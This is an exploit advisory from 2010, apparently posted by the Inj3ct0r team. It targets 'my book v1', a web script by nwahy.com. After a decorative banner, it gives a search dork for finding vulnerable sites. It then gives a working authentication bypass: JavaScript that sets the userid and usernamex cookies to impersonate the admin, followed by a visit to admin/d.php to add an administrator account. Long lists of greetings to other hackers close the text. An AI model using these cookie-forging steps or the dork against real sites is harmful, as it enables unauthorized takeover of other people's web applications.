mybook-insecure.txt
Posted on 17 July 2010
======================================================================= # my book v1 ( insecure Cookie Handling Vulnerability) Vulnerability ======================================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 #################################### 1 0 I'm indoushka member from Inj3ct0r Team 1 1 #################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ######################################################################## # Vendor: http://www.nwahy.com/ # Date: 2010-05-27 # Author : indoushka # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! # Contact : indoushka@hotmail.com # Home : www.0xr00t.com # Bug : insecure Cookie Handling Vulnerability # Tested on : windows SP2 Français V.(Pnx2 2.0) ######################################################################## # Dork : Powered by my book v1 - Programming by: nwahy.com # Exploit By indoushka 1 -http://127.0.0.1/book/admin/ javascript:document.cookie="userid=1;path=/"; javascript:document.cookie="usernamex=admin;path=/"; (chang admin to the real name of admin of the web site) 2 - http://127.0.0.1/book/admin/d.php (Add Admin) Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== all my friend : His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N (cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH ---------------------------------------------------------------------------------------------------------------------------------